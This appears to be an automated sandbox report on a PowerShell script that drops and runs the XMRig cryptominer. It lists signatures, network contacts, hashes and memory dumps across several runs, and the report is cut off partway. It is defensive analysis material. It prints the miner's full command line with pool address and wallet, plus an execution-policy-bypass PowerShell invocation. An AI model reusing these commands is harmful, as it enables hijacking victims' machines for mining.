memory/656-62-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-63-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-64-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-65-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-66-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-67-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-68-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-69-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-70-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-71-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-72-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-73-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-74-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-75-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-76-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-77-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-78-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-79-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-80-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-81-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-82-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-83-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-84-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-85-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-86-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-87-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-88-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-89-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-90-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-91-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-92-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-93-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-94-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-95-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-96-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-97-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-98-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-99-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-100-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-101-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-102-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-103-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-104-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-105-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-106-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-107-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-108-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-109-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-110-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-111-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-112-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-113-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-114-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-115-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

memory/656-116-0x00007FF6F03D0000-0x00007FF6F1003000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 05:48

Platform

win10v2004-20240508-en

Max time kernel

1790s

Max time network

1778s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 129.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 252.15.104.51.in-addr.arpa udp

Files

memory/924-0-0x00007FFDAE393000-0x00007FFDAE395000-memory.dmp

memory/924-1-0x000001C7C4B70000-0x000001C7C4B92000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h5uewoym.45q.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/924-11-0x00007FFDAE390000-0x00007FFDAEE51000-memory.dmp

memory/924-12-0x00007FFDAE390000-0x00007FFDAEE51000-memory.dmp

memory/924-14-0x00007FFDAE390000-0x00007FFDAEE51000-memory.dmp

memory/924-15-0x000001C7C4F00000-0x000001C7C4F12000-memory.dmp

memory/924-16-0x000001C7C4EF0000-0x000001C7C4EFA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4820-47-0x00000273AD840000-0x00000273AD860000-memory.dmp

memory/4820-48-0x00000273AF050000-0x00000273AF070000-memory.dmp

memory/4820-49-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-50-0x00000273AF070000-0x00000273AF090000-memory.dmp

memory/4820-51-0x00000273AF090000-0x00000273AF0B0000-memory.dmp

memory/4820-52-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/924-53-0x00007FFDAE393000-0x00007FFDAE395000-memory.dmp

memory/924-54-0x00007FFDAE390000-0x00007FFDAEE51000-memory.dmp

memory/4820-55-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-56-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-58-0x00000273AF090000-0x00000273AF0B0000-memory.dmp

memory/4820-57-0x00000273AF070000-0x00000273AF090000-memory.dmp

memory/4820-59-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-60-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-61-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-62-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-63-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-64-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-65-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-66-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-67-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-68-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-69-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-70-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-71-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-72-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-73-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-74-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-75-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-76-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-77-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-78-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-79-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-80-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-81-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-82-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-83-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-84-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-85-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-86-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-87-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-88-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-89-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-90-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-91-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-92-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-93-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-94-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-95-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-96-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-97-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-98-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-99-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-100-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-101-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-102-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-103-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-104-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-105-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-106-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-107-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-108-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-109-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-110-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-111-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-112-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-113-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-114-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-115-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-116-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

memory/4820-117-0x00007FF682EB0000-0x00007FF683AE3000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 05:56

Platform

win11-20240419-en

Max time kernel

1790s

Max time network

1787s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/3656-0-0x00007FFE572F3000-0x00007FFE572F5000-memory.dmp

memory/3656-3-0x0000021F65D70000-0x0000021F65D92000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bhyd5gp4.zrs.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3656-10-0x00007FFE572F0000-0x00007FFE57DB2000-memory.dmp

memory/3656-11-0x00007FFE572F0000-0x00007FFE57DB2000-memory.dmp

memory/3656-12-0x00007FFE572F0000-0x00007FFE57DB2000-memory.dmp

memory/3656-14-0x0000021F66250000-0x0000021F66262000-memory.dmp

memory/3656-15-0x0000021F65FF0000-0x0000021F65FFA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3864-46-0x000002ACC0420000-0x000002ACC0440000-memory.dmp

memory/3864-47-0x000002ACC0470000-0x000002ACC0490000-memory.dmp

memory/3864-48-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-50-0x000002ACC1C40000-0x000002ACC1C60000-memory.dmp

memory/3656-51-0x00007FFE572F3000-0x00007FFE572F5000-memory.dmp

memory/3656-49-0x00007FFE572F0000-0x00007FFE57DB2000-memory.dmp

memory/3864-52-0x000002ACC1C60000-0x000002ACC1C80000-memory.dmp

memory/3864-53-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-54-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-55-0x000002ACC1C40000-0x000002ACC1C60000-memory.dmp

memory/3864-57-0x000002ACC1C60000-0x000002ACC1C80000-memory.dmp

memory/3864-56-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-58-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-59-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-60-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-61-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-62-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-63-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-64-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-65-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-66-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-67-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-68-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-69-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-70-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-71-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-72-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-73-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-74-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-75-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-76-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-77-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-78-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-79-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-80-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-81-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-82-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-83-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-84-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-85-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-86-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-87-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-88-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-89-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-90-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-91-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-92-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-93-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-94-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-95-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-96-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-97-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-98-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-99-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-100-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-101-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-102-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-103-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-104-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-105-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-106-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-107-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-108-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-109-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-110-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-111-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-112-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-113-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-114-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-115-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

memory/3864-116-0x00007FF67CC10000-0x00007FF67D843000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 06:06

Platform

win10v2004-20240508-en

Max time kernel

1790s

Max time network

1794s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

